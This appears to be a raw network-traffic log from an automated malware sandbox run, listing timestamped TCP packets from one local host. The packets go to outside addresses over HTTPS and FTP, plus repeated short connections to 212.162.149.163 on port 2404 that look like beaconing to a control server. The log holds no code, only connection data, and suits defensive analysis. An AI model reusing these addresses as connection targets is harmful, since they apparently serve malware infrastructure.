                                Oct 3, 2024 09:28:19.798819065 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.798839092 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.798896074 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.798911095 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.798923969 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.798969984 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.799972057 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.800034046 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.800532103 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.800595045 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.801254988 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.801311016 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.802136898 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.802191973 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.802212954 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.802265882 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.805404902 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.805476904 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.887180090 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.887274981 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.887444019 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.887509108 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.887756109 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.887808084 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.888039112 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.888092995 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.888170958 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.888231039 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.888952971 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.889005899 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.889061928 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.889118910 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.889735937 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.889806032 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.889868975 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.889908075 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.889920950 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.889928102 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.889954090 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.889985085 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.890770912 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.890856981 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.890919924 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.890966892 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.890971899 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.891020060 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.894045115 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.894118071 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.894201994 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.895596027 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.976304054 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.976397038 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.976412058 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.976427078 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.976464987 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.976470947 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.976480007 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.976528883 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.976629019 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.976685047 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.976772070 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.976828098 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.976844072 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.976903915 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.977015972 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.977067947 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.977260113 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.977324963 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.977418900 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.977478981 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.977587938 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.977631092 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.977639914 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.977646112 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.977674961 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.981698990 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.981767893 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.981868029 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.981919050 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.982134104 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.982191086 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.982901096 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.982953072 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:19.983063936 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:19.983124971 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.064707994 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.064755917 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.064773083 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.064789057 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.064821005 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.064826965 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.064840078 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.064843893 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.064872980 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.064894915 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.064922094 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.064966917 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.065150023 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.065195084 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.065323114 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.065398932 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.065404892 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.065417051 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.065452099 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.065474987 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.065649033 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.065699100 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.065987110 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.066034079 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.066138983 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.066193104 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.066198111 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.066255093 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.066258907 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.066318035 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.066585064 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.066641092 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.066740036 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.066791058 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.071472883 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.071543932 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.071579933 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.071628094 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.153158903 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.153234959 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.153243065 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.153259039 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.153280020 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.153285980 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.153299093 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.153302908 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.153330088 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.153361082 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.153489113 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.153547049 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.153641939 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.153708935 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.153810024 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.153865099 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.153981924 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.154046059 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.154149055 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.154205084 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.154253960 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.154314041 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.154567957 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.154619932 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.154686928 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.154747963 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.154890060 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.154939890 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.154947042 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.155016899 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.155183077 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.155241013 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.159703970 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.159761906 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.160335064 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.160406113 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.241641998 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.241723061 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.241749048 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.241800070 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.241934061 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.241996050 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.242007971 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.242058992 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.242217064 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.242252111 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.242269039 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.242275000 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.242315054 CEST44349719173.231.247.100192.168.2.6
                                Oct 3, 2024 09:28:20.242316008 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.242377996 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.242697954 CEST49719443192.168.2.6173.231.247.100
                                Oct 3, 2024 09:28:20.258150101 CEST4971521192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:20.258320093 CEST4971121192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:20.262964010 CEST2149715191.252.83.213192.168.2.6
                                Oct 3, 2024 09:28:20.480519056 CEST2149715191.252.83.213192.168.2.6
                                Oct 3, 2024 09:28:20.481161118 CEST4972160509192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:20.486017942 CEST6050949721191.252.83.213192.168.2.6
                                Oct 3, 2024 09:28:20.487404108 CEST4972160509192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:20.487405062 CEST4971521192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:20.492326975 CEST2149715191.252.83.213192.168.2.6
                                Oct 3, 2024 09:28:20.710704088 CEST2149715191.252.83.213192.168.2.6
                                Oct 3, 2024 09:28:20.852370977 CEST4971521192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:21.101475000 CEST2149715191.252.83.213192.168.2.6
                                Oct 3, 2024 09:28:21.101907015 CEST6050949721191.252.83.213192.168.2.6
                                Oct 3, 2024 09:28:21.102036953 CEST6050949721191.252.83.213192.168.2.6
                                Oct 3, 2024 09:28:21.104288101 CEST4972160509192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:21.105557919 CEST4972160509192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:21.110831022 CEST6050949721191.252.83.213192.168.2.6
                                Oct 3, 2024 09:28:21.113929033 CEST49722443192.168.2.6188.114.97.3
                                Oct 3, 2024 09:28:21.113977909 CEST44349722188.114.97.3192.168.2.6
                                Oct 3, 2024 09:28:21.114053965 CEST49722443192.168.2.6188.114.97.3
                                Oct 3, 2024 09:28:21.118305922 CEST49722443192.168.2.6188.114.97.3
                                Oct 3, 2024 09:28:21.118325949 CEST44349722188.114.97.3192.168.2.6
                                Oct 3, 2024 09:28:21.152345896 CEST4971521192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:21.594981909 CEST44349722188.114.97.3192.168.2.6
                                Oct 3, 2024 09:28:21.596285105 CEST49722443192.168.2.6188.114.97.3
                                Oct 3, 2024 09:28:21.596313000 CEST44349722188.114.97.3192.168.2.6
                                Oct 3, 2024 09:28:22.004806995 CEST44349722188.114.97.3192.168.2.6
                                Oct 3, 2024 09:28:22.004930973 CEST44349722188.114.97.3192.168.2.6
                                Oct 3, 2024 09:28:22.004988909 CEST49722443192.168.2.6188.114.97.3
                                Oct 3, 2024 09:28:22.005292892 CEST49722443192.168.2.6188.114.97.3
                                Oct 3, 2024 09:28:22.153609037 CEST4971521192.168.2.6191.252.83.213
                                Oct 3, 2024 09:28:23.407372952 CEST49724443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:23.407437086 CEST44349724104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:23.407536030 CEST49724443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:23.411376953 CEST49724443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:23.411412954 CEST44349724104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:23.871898890 CEST44349724104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:23.871975899 CEST49724443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:23.923412085 CEST49724443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:23.923448086 CEST44349724104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:23.923831940 CEST44349724104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:23.940798998 CEST49724443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:23.987416983 CEST44349724104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:24.488431931 CEST44349724104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:24.488535881 CEST44349724104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:24.488604069 CEST49724443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:24.489475012 CEST49724443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:24.681642056 CEST497252404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:24.686753035 CEST240449725212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:24.686933994 CEST497252404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:24.687916994 CEST497252404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:24.692799091 CEST240449725212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:26.185148001 CEST240449725212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:26.185230970 CEST497252404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:26.185309887 CEST497252404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:26.190119028 CEST240449725212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:27.196548939 CEST497262404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:27.201637030 CEST240449726212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:27.201709032 CEST497262404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:27.202095032 CEST497262404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:27.207058907 CEST240449726212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:27.751487017 CEST49728443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:27.751523972 CEST44349728104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:27.751596928 CEST49728443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:27.755479097 CEST49728443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:27.755496025 CEST44349728104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:28.233577967 CEST44349728104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:28.233680964 CEST49728443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:28.235183001 CEST49728443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:28.235200882 CEST44349728104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:28.235467911 CEST44349728104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:28.241941929 CEST49728443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:28.287412882 CEST44349728104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:28.365071058 CEST44349728104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:28.365225077 CEST44349728104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:28.365287066 CEST49728443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:28.366473913 CEST49728443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:28.696204901 CEST240449726212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:28.696275949 CEST497262404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:28.696376085 CEST497262404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:28.701366901 CEST240449726212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:29.712543964 CEST497292404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:29.717639923 CEST240449729212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:29.719142914 CEST497292404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:29.719551086 CEST497292404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:29.724337101 CEST240449729212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:31.200728893 CEST240449729212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:31.200798988 CEST497292404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:31.200861931 CEST497292404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:31.209461927 CEST240449729212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:32.221999884 CEST497302404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:32.236903906 CEST240449730212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:32.236990929 CEST497302404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:32.237385988 CEST497302404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:32.248251915 CEST240449730212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:33.713100910 CEST240449730212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:33.713176012 CEST497302404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:33.713224888 CEST497302404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:33.719793081 CEST240449730212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:34.731566906 CEST497312404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:34.737783909 CEST240449731212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:34.737900972 CEST497312404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:34.741502047 CEST497312404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:34.747100115 CEST240449731212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:35.174355984 CEST49732443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:35.174432993 CEST44349732104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:35.174519062 CEST49732443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:35.176908970 CEST49732443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:35.176922083 CEST44349732104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:35.686245918 CEST44349732104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:35.686353922 CEST49732443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:35.687767982 CEST49732443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:35.687777996 CEST44349732104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:35.688075066 CEST44349732104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:35.693913937 CEST49732443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:35.739408016 CEST44349732104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:35.845540047 CEST44349732104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:35.845644951 CEST44349732104.20.4.235192.168.2.6
                                Oct 3, 2024 09:28:35.845696926 CEST49732443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:35.846471071 CEST49732443192.168.2.6104.20.4.235
                                Oct 3, 2024 09:28:36.222244024 CEST240449731212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:36.223417044 CEST497312404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:36.223417044 CEST497312404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:36.233028889 CEST240449731212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:37.237345934 CEST497332404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:37.257577896 CEST240449733212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:37.257668972 CEST497332404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:37.263282061 CEST497332404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:37.273515940 CEST240449733212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:38.724689960 CEST240449733212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:38.724754095 CEST497332404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:38.724809885 CEST497332404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:38.730110884 CEST240449733212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:39.728118896 CEST497342404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:39.736846924 CEST240449734212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:39.736953020 CEST497342404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:39.737467051 CEST497342404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:39.745969057 CEST240449734212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:41.229326963 CEST240449734212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:41.229469061 CEST497342404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:41.229984999 CEST497342404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:41.238605022 CEST240449734212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:42.253864050 CEST497352404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:42.259335995 CEST240449735212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:42.259437084 CEST497352404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:42.259850979 CEST497352404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:42.265372992 CEST240449735212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:43.763794899 CEST240449735212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:43.763906002 CEST497352404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:43.763962984 CEST497352404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:43.783535004 CEST240449735212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:44.776401997 CEST497362404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:44.783514023 CEST240449736212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:44.783610106 CEST497362404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:44.783981085 CEST497362404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:44.789810896 CEST240449736212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:46.301676035 CEST240449736212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:46.301906109 CEST497362404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:46.301906109 CEST497362404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:46.337704897 CEST240449736212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:47.306060076 CEST497372404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:47.321175098 CEST240449737212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:47.322340965 CEST497372404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:47.323436975 CEST497372404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:47.339312077 CEST240449737212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:48.803081036 CEST240449737212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:48.803248882 CEST497372404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:48.803248882 CEST497372404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:48.808595896 CEST240449737212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:49.806391001 CEST497392404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:49.811424017 CEST240449739212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:49.811549902 CEST497392404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:49.811942101 CEST497392404192.168.2.6212.162.149.163
